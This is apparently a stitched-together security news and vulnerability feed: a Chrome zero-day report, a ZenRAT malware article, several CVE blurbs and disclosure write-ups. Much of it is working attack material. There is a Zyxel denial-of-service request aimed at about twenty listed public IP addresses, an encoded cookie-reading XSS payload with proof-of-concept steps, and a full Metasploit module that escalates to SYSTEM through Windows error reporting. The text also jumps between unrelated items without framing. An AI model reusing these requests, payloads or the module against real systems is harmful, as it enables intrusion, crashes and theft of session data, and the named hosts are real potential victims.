Google on Wednesday rolled out fixes to address a new actively exploited zero-day in the Chrome browser.
Tracked as CVE-2023-5217, the high-severity vulnerability has been described as a heap-based buffer overflow in the VP8 compression format in libvpx, a free software video codec library from Google and the Alliance for Open Media (AOMedia).
Exploitation of such buffer overflow flaws can

Google on Wednesday rolled out fixes to address a new actively exploited zero-day in the Chrome browser.

Tracked as **CVE-2023-5217**, the high-severity vulnerability has been described as a heap-based buffer overflow in the VP8 compression format in libvpx, a free software video codec library from Google and the Alliance for Open Media (AOMedia).

Exploitation of such buffer overflow flaws can result in program crashes or execution of arbitrary code, impacting its availability and integrity.

Clément Lecigne of Google's Threat Analysis Group (TAG) has been credited with discovering and reporting the flaw on September 25, 2023, with fellow researcher Maddie Stone noting on X (formerly Twitter) that it has been abused by a commercial spyware vendor to target high-risk individuals.

No additional details have been disclosed by the tech giant other than to acknowledge that it's "aware that an exploit for CVE-2023-5217 exists in the wild."

The latest discovery brings to five the number of zero-day vulnerabilities to Google Chrome for which patches have been released this year -

*   **CVE-2023-2033** (CVSS score: 8.8) - Type confusion in V8
*   **CVE-2023-2136** (CVSS score: 9.6) - Integer overflow in Skia
*   **CVE-2023-3079** (CVSS score: 8.8) - Type confusion in V8
*   **CVE-2023-4863** (CVSS score: 8.8) - Heap buffer overflow in WebP

The development comes as Google assigned a new CVE identifier, CVE-2023-5129, to the critical flaw in the libwebp image library – originally tracked as CVE-2023-4863 – that has come under active exploitation in the wild, considering its broad attack surface.

Users are recommended to upgrade to Chrome version 117.0.5938.132 for Windows, macOS, and Linux to mitigate potential threats. Users of Chromium-based browsers such as Microsoft Edge, Brave, Opera, and Vivaldi are also advised to apply the fixes as and when they become available.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Update Chrome Now: Google Releases Patch for Actively Exploited Zero-Day Vulnerability

Buffer Overflow vulnerability in ZYXEL ZYXEL v.PMG2005-T20B allows a remote attacker to cause a denial of service via a crafted script to the uid parameter in the cgi-bin/login.asp component.

**Rumble**

ZYXEL-PMG2005-T20B has a denial of service vulnerability.Buffer Overflow vulnerability in ZYXEL ZYXEL v.PMG2005-T20B allows a remote attacker to cause a denial of service via a crafted script to the uid parameter in the cgi-bin/login.asp component.

Zyxel is a leading global provider of comprehensive communication and information solutions, providing innovative technology and product solutions for telecom operators, government and enterprise customers, and consumers worldwide. ZYXEL-PMG2005-T20B has a denial of service vulnerability. Attackers can exploit this vulnerability to cause the browser to crash.

Triggered process：Using a valid SESSIONID of the ZYXEL-PMG2005-T20B product, when the number of admin in the uid reaches 50, backend parsing can cause any web application of the product ZYXEL-PMG2005-T20B to crash.

The following are the details of the vulnerability:  
1.Vulnerability Address：http://177.221.16.243/cgi-bin/login.asp  
Request Package：  
GET /cgi-bin/index.asp HTTP/1.1  
Host: 177.221.16.243  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,_/_;q=0.8,application/signed-exchange;v=b3;q=0.9  
Referer: http://177.221.16.243/cgi-bin/login.asp  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: SESSIONID=4450a48a; uid=adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin; psw=1234  
Connection: close

Browser crashes after execution  
2.Vulnerability Address：http://179.191.53.240/cgi-bin/login.asp  
Request Package：  
GET /cgi-bin/index.asp HTTP/1.1  
Host: 179.191.53.240  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,_/_;q=0.8,application/signed-exchange;v=b3;q=0.9  
Referer: http://179.191.53.240/cgi-bin/login.asp  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: SESSIONID=4450a48a; uid=adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin; psw=1234  
Connection: close

Browser crashes after execution  
3.  
Vulnerability Address：http://179.191.53.133/cgi-bin/login.asp

Request Package：  
GET /cgi-bin/index.asp HTTP/1.1  
Host: 179.191.53.133  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,_/_;q=0.8,application/signed-exchange;v=b3;q=0.9  
Referer: http://179.191.53.133/cgi-bin/login.asp  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: SESSIONID=4450a48a; uid=adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin; psw=1234  
Connection: close

Browser crashes after execution

Vulnerability Address：http://177.221.17.76/cgi-bin/login.asp  
Request Package：  
GET /cgi-bin/index.asp HTTP/1.1  
Host: 177.221.17.76  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,_/_;q=0.8,application/signed-exchange;v=b3;q=0.9  
Referer: http://177.221.17.76/cgi-bin/login.asp  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie:SESSIONID=4450a48a; uid=adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin; psw=1234  
Connection: close

Browser crashes after execution

5.Vulnerability Address：http://187.111.205.144/cgi-bin/login.asp  
6.Vulnerability Address：http://179.191.53.138/cgi-bin/login.asp  
7.Vulnerability Address：http://187.111.205.157/cgi-bin/login.asp  
8.Vulnerability Address：http://189.36.156.42/cgi-bin/login.asp  
9.Vulnerability Address：http://179.191.53.15/cgi-bin/login.asp  
10.Vulnerability Address：http://45.182.161.27/cgi-bin/login.asp  
11.Vulnerability Address：http://45.182.161.46/cgi-bin/login.asp  
12.Vulnerability Address：http://45.182.161.42/cgi-bin/login.asp  
13.Vulnerability Address：http://45.182.161.47/cgi-bin/login.asp  
14.Vulnerability Address：http://45.182.161.43/cgi-bin/login.asp  
15.Vulnerability Address：http://45.182.161.25/cgi-bin/login.asp  
16.Vulnerability Address：http://179.191.53.89/cgi-bin/login.asp  
17.Vulnerability Address：http://179.107.195.230/cgi-bin/login.asp  
18.Vulnerability Address：http://45.182.161.41/cgi-bin/login.asp  
19.Vulnerability Address：http://45.182.161.33/cgi-bin/login.asp  
20.Vulnerability Address：http://45.182.161.45/cgi-bin/login.asp

Request package is：  
GET /cgi-bin/index.asp HTTP/1.1  
Host: IP  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,_/_;q=0.8,application/signed-exchange;v=b3;q=0.9  
Referer: http://IP/cgi-bin/login.asp  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie:SESSIONID=4450a48a; uid=adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin; psw=1234  
Connection: close

Replacing the above two IPs with the target IP can cause the browser to crash

The following is a vulnerability replay video:  
https://github.com/Rumble00/Rumble/assets/145107465/c1ad7082-513f-427f-9706-30c75097d586

CVE-2023-43314: ZYXEL-PMG2005-T20B has a denial of service vulnerability · Issue #1 · Rumble00/Rumble

Cross Site Scripting vulnerability in phpkobo AjaxNewTicker v.1.0.5 allows a remote attacker to execute arbitrary code via a crafted payload to the ID parameter in the index.php component.

Vulnerability Type: Cross Site Scripting (XSS) Vulnerability

Vendor of Product: phpkobo

Affected Product Code Base: AjaxNewsTicker

Product Version: 1.05

Description: Cross Site Scripting vulnerability in phpkobo AjaxNewTicker v.1.0.5 allows a remote attacker to execute arbitrary code via a crafted payload inside the "ID" parameter in "publish or view news" in the index.php component.

Attack Vectors: To exploit this vulnerability the victim must click on the malicious link and then the payload will be executed on the victim's browser.

Attack Type: Remote

Payload: %22%3e%3c%2f%73%63%72%69%70%74%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%29%3c%2f%73%63%72%69%70%74%3e

Assigned CVE-ID: CVE-2023-41448

Discoverer: Pedram Khazaei, Raspina Net Pars Group (RNPG Ltd.)

Steps To Reproduce

1\. Browse the the following URL: https://<target.xyz>/ntic/admin/index.php?\_rtp=run-preview&id=\*&inme=scripttag

2\. Insert payload in the "id" parameter in GET method

3\. You can create your malicious payload and send the crafted malicious link to the victim in order to be executed on his/her browser.

#PoC

GET ntic/admin/index.php?\_rtp=run-preview&id=3521%22%3e%3c%2f%73%63%72%69%70%74%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%29%3c%2f%73%63%72%69%70%74%3e&inme=scripttag HTTP/1.1

Host: localhost:2222

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,imagewebp\*/\*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: close

CVE-2023-41448: CVE-2023-41448

By Deeba Ahmed
If you’ve installed Bitwarden Password Manager recently, ensure that you downloaded it from its official website and not…
This is a post from HackRead.com Read the original post: Fake Bitwarden Password Manager Website Drops Windows ZenRAT

If you’ve installed Bitwarden Password Manager recently, ensure that you downloaded it from its official website and not from a fraudulent, malicious source.

*   **ZenRAT malware is distributed as an installation package for the widely used Bitwarden password manager.**

*   **Malware operators have designed a fake Bitwarden website to deliver the malware.**

*   **It specifically looks for Windows-based devices.**

*   **ZenRAT is a modular RAT capable of stealing sensitive information.**

Enterprise security firm Proofpoint’s cybersecurity researchers have discovered a spooky new malware distributed as an installation package for the popular password manager Bitwarden to deceive users and steal sensitive data from their devices.

This bogus installation package, dubbed ZenRAT, is delivered via a fake Bitwarden website, which looks exactly like the original one but is not legitimate. If a user pays attention, it is easy to catch that malware operators have used the typosquatting technique because the fake website is titled bitwaridencom.

The fake website (Proofpoint)

ZenRAT’s main targets are unsuspecting Windows users. If a visitor clicks on the downloadable link marked for another platform (e.g., Linux or macOS), they are redirected to the original Bitwarden website (vault.bitwarden.com) on the Downloads page. If a Windows user clicks on it, their device will be infected with ZenRAT, and the malware will establish a connection with its C2 server (185.186.7214).

Once this is done, the malware will collect desired data, including system details and stored credentials. ZenRAT can steal information like the CPU and GPU names, OS version, RAM, IP address, and device gateway. It will also extract information about installed antivirus solutions and other apps. It can also steal browser data and passwords. ZenRAT transmits the logs to the C2 server in plaintext.

It redirects the website visitors to a benign website. However, researchers didn’t specify how the visitors are redirected to the website. Previously, the malware was distributed in such campaigns through phishing, SEO poisoning, or malvertising attacks. The payload is titled Bitwarden-installer-version-2023-7-1.exe and downloaded via crazygamescom. This trojanized version of the legit Bitwarden installer contains a .NET executable titled (ApplicationRuntimeMonitor.exe).

According to Proofpoint’s blog post, when researchers examined the malicious installer package’s metadata, they observed that the attacker had masqueraded it as Priform’s Speccy. It is a freeware Windows utility that displays hardware/software-related information.

Moreover, the executable has an invalid signature that seems to be signed by FileZilla fame German computer scientist Tim Kosse. However, this signature is also fake. This modular RAT also runs anti-sandbox and anti-VM checks to determine if it is safe to operate on the device. The checks also include geofencing to ensure it isn’t installed in any Russian-speaking region.

****Exercise Caution When Using a Password Manager****

Researchers strongly advise users to exercise caution when downloading software and recommend obtaining applications exclusively from official sources. It’s worth noting that password managers have frequently been targeted in cyberattacks and scams, with LastPass being a notable example.

As a safer alternative, the top three browsers—Google Chrome, Mozilla Firefox, and Safari—offer free password manager features. If you’re unsure about which service to use, any of these three options would provide similar benefits and, in some cases, may be more secure than others.

****RELATED ARTICLES****

1.  Fake Windows 11 installers infecting devices with adware
2.  Big Head Ransomware in Malvertising, Fake Windows Updates
3.  Fake Telegram, WhatsApp clones aims at crypto on Android, Windows

Fake Bitwarden Password Manager Website Drops Windows ZenRAT

This Metasploit module takes advantage of a bug in the way Windows error reporting opens the report parser. If you open a report, Windows uses a relative path to locate the rendering program. By creating a specific alternate directory structure, we can coerce Windows into opening an arbitrary executable as SYSTEM. If the current user is a local admin, the system will attempt impersonation and the exploit will fail.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Local  Rank = ExcellentRanking  include Msf::Post::Common  include Msf::Post::File  include Msf::Exploit::FileDropper  include Msf::Post::Windows::Priv  include Msf::Exploit::EXE  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Microsoft Error Reporting Local Privilege Elevation Vulnerability',        'Description' => %q{          This module takes advantage of a bug in the way Windows error reporting opens the report          parser.  If you open a report, Windows uses a relative path to locate the rendering program.          By creating a specific alternate directory structure, we can coerce Windows into opening an          arbitrary executable as SYSTEM.          If the current user is a local admin, the system will attempt impersonation and the exploit will          fail.        },        'License' => MSF_LICENSE,        'Author' => [          'Filip Dragović (Wh04m1001)', # PoC          'Octoberfest7', # PoC          'bwatters-r7' # msf module        ],        'Platform' => ['win'],        'SessionTypes' => [ 'meterpreter', 'shell', 'powershell' ],        'Targets' => [          [ 'Automatic', { 'Arch' => [ ARCH_X64 ] } ]        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2023-07-11',        'References' => [          ['CVE', '2023-36874'],          ['URL', 'https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/'],          ['URL', 'https://github.com/Wh04m1001/CVE-2023-36874'],          ['URL', 'https://github.com/Octoberfest7/CVE-2023-36874_BOF']        ],        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ ARTIFACTS_ON_DISK ]        },        'Compat' => {          'Meterpreter' => {            'Commands' => %w[              stdapi_fs_delete_file              stdapi_sys_config_getenv            ]          }        }      )    )    register_options([      OptString.new('EXPLOIT_NAME',                    [true, 'The filename to use for the exploit binary (%RAND%.exe by default).', "#{Rex::Text.rand_text_alpha(6..14)}.exe"]),      OptString.new('REPORT_DIR',                    [true, 'The Error Directory to use (%RAND% by default).', Rex::Text.rand_text_alpha(6..14).to_s]),      OptString.new('SHADOW_DRIVE',                    [true, 'Directory to place in the home drive for pivot (%TEMP% by default).', Rex::Text.rand_text_alpha(6..14).to_s]),      OptInt.new('EXECUTE_DELAY',                 [true, 'The number of seconds to delay between file upload and exploit launch', 3])    ])  end  # When we pass the directory value to the mkdir method, the mkdir method  # passes the reference to the string containing the directory.  # We do a lot of string manipulation in this module, so this is a quick  # hack to make sure that despite what we do with the string after we create  # the directory, it is  the actual directory we created that gets sent to  # the cleanup methods.  def clone_mkdir(dir)    mkdir(dir.clone)  end  def upload_error_report    wer_archive_dir = get_env('PROGRAMDATA')    vprint_status(wer_archive_dir)    wer_archive_dir << '\\Microsoft\\Windows\\WER\\ReportArchive'    report_dir = "#{wer_archive_dir}\\#{datastore['REPORT_DIR']}"    report_filename = "#{report_dir}\\Report.wer"    vprint_status("Creating #{report_dir}")    clone_mkdir(report_dir)    wer_report_data = exploit_data('CVE-2023-36874', 'Report.wer')    vprint_status("Writing Report to #{report_filename}")    write_file(report_filename, wer_report_data)  end  def build_shadow_archive_dir(shadow_base_dir)    wer_archive_dir = shadow_base_dir    clone_mkdir(wer_archive_dir)    wer_archive_dir << '\\ProgramData\\'    clone_mkdir(wer_archive_dir)    wer_archive_dir << 'Microsoft\\'    clone_mkdir(wer_archive_dir)    wer_archive_dir << 'Windows\\'    clone_mkdir(wer_archive_dir)    wer_archive_dir << 'WER\\'    clone_mkdir(wer_archive_dir)    wer_archive_dir << 'ReportArchive\\'    clone_mkdir(wer_archive_dir)    report_dir = "#{wer_archive_dir}#{datastore['REPORT_DIR']}"    clone_mkdir(report_dir)    return report_dir  end  def upload_shadow_report(shadow_archive_dir)    report_filename = "#{shadow_archive_dir}\\Report.wer"    wer_report_data = exploit_data('CVE-2023-36874', 'Report.wer')    vprint_status("Writing bad Report to #{report_filename}")    write_file(report_filename, wer_report_data)  end  def build_shadow_system32(shadow_base_dir)    shadow_win32 = "#{shadow_base_dir}\\system32"    vprint_status("Creating #{shadow_win32}")    clone_mkdir(shadow_win32)    return shadow_win32  end  def upload_payload(shadow_win32)    payload_bin = generate_payload_exe    payload_filename = "#{shadow_win32}\\wermgr.exe"    vprint_status("Writing payload to #{payload_filename}")    write_file(payload_filename, payload_bin)  end  def upload_execute_exploit(exploit_path, shadow_path, home_dir)    vprint_status("shadow_path = #{shadow_path}")    exploit_bin = exploit_data('CVE-2023-36874', 'CVE-2023-36874.exe')    write_file(exploit_path, exploit_bin)    sleep datastore['EXECUTE_DELAY']    vprint_status("Exploit uploaded to #{exploit_path}")    cmd = "#{exploit_path} #{shadow_path} #{home_dir} #{datastore['REPORT_DIR']}"    output = cmd_exec(cmd, nil, 30)    vprint_status(output)  end  def check    # This only appears to work on 22H2, but likely will work elsewhere if we figure out the function pointers.    version = get_version_info    vprint_status("OS version: #{version}")    return Exploit::CheckCode::Appears if version.build_number == Msf::WindowsVersion::Win10_22H2    return Exploit::CheckCode::Safe  end  def exploit    fail_with(Module::Failure::BadConfig, 'User cannot be local admin') if is_in_admin_group?    fail_with(Module::Failure::BadConfig, 'Already SYSTEM') if is_system?    shadow_dir = datastore['SHADOW_DRIVE']    home_dir = get_env('HOMEDRIVE')    shadow_path = "#{home_dir}\\#{shadow_dir}"    vprint_status("Shadow Path = #{shadow_path}")    upload_error_report    shadow_archive_dir = build_shadow_archive_dir(shadow_path.dup)    upload_shadow_report(shadow_archive_dir)    shadow_system32 = build_shadow_system32(shadow_path.dup)    upload_payload(shadow_system32)    sleep datastore['EXECUTE_DELAY']    exploit_path = "#{shadow_path}\\#{datastore['EXPLOIT_NAME']}"    exploit_path << '.exe' unless exploit_path[-4..] == '.exe'    if shadow_dir.length > 64      fail_with(Module::Failure::BadConfig, 'REPORT_DIR value too long')    end    upload_execute_exploit(exploit_path, shadow_dir, home_dir)    print_warning("Manual deletion of #{shadow_path} may be required")  endend

Microsoft Error Reporting Local Privilege Elevation

Deserialization of Untrusted Data in emlog pro v.2.1.15 and earlier allows a remote attacker to execute arbitrary code via the cache.php component.

CVE-2023-43291: CVE-2023-43291.md

Sensitive information disclosure due to insufficient token field masking. The following products are affected: Acronis Cyber Protect 15 (Linux, Windows) before build 35979.

CVE-2023-44158

Local privilege escalation due to insecure folder permissions. The following products are affected: Acronis Cyber Protect 15 (Windows) before build 35979.

CVE-2023-44157

Sensitive information disclosure due to spell-jacking. The following products are affected: Acronis Cyber Protect 15 (Linux, Windows) before build 35979.

CVE-2023-44156

Sensitive information leak through log files. The following products are affected: Acronis Cyber Protect 15 (Linux, Windows) before build 35979.

Tag

#windows